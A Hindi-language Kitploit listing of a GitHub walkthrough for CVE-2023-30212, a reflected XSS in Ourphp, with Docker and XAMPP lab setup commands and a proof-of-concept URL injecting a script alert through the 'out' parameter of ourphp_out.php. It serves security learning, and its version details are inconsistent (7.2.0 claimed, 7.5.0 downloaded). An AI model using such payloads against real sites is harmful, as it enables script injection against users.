Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kai-iszz/cve-2023-30212
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubkai-iszz/cve-2023-30212

CVE-2023-30212

CVE-2023-30212 के लिए चरण-दर-चरण शोषण मार्गदर्शिका, Ourphp 7.2.0 में एक XSS कमजोरी, Docker सेटअप और पेलोड इंजेक्शन प्रदर्शन के साथ।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-30212

Ourphp संस्करण 7.2.0 में भेद्यता का शोषण, जिसे CVE 2023 30212 भी कहा जाता है

चरण 1. अपने सिस्टम में Docker डाउनलोड और इंस्टॉल करें (नोट). मैं Docker का उपयोग कर रहा हूँ क्योंकि ubuntu इंस्टॉल करना त्वरित और आसान है।

चरण 2. Docker वातावरण सेटअप करें

root@kitploit:~
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash

चरण 3. वेब सर्वर, php और mysql इंस्टॉल करें। इसके लिए मैं xampp सर्वर इंस्टॉल करूँगा।

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run 
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start

चरण 4. Ourphp संस्करण 7.2.0 डाउनलोड करें

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775

चरण 5. ब्राउज़र में Ourphp सेटअप करें अपना ब्राउज़र खोलें और localhost या 127.0.0.1 दर्ज करें निर्देशों का पालन करें और Ourphp इंस्टॉल करें।

चरण 6. भेद्यता का शोषण करना Ourphp 7.2.0 संस्करण में XSS (क्रॉस-साइट स्क्रिप्टिंग) की भेद्यता है। /client/manage/ourphp_out.php फ़ाइल में XSS कोड के निष्पादन की अनुमति देने वाली भेद्यता को कम करने के लिए,

आपको कोड को संशोधित करना होगा। यह भेद्यता तब उत्पन्न होती है जब "ourphp_admin" पैरामीटर को "logout" पर सेट किया जाता है, और नियंत्रणीय चर "out" प्रतिध्वनित होता है।

हमलावर "" जैसे पेलोड इंजेक्ट करके इसका शोषण कर सकते हैं।

root@kitploit:~
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

Screenshot 2023-05-29 135740

टूल डाउनलोड करें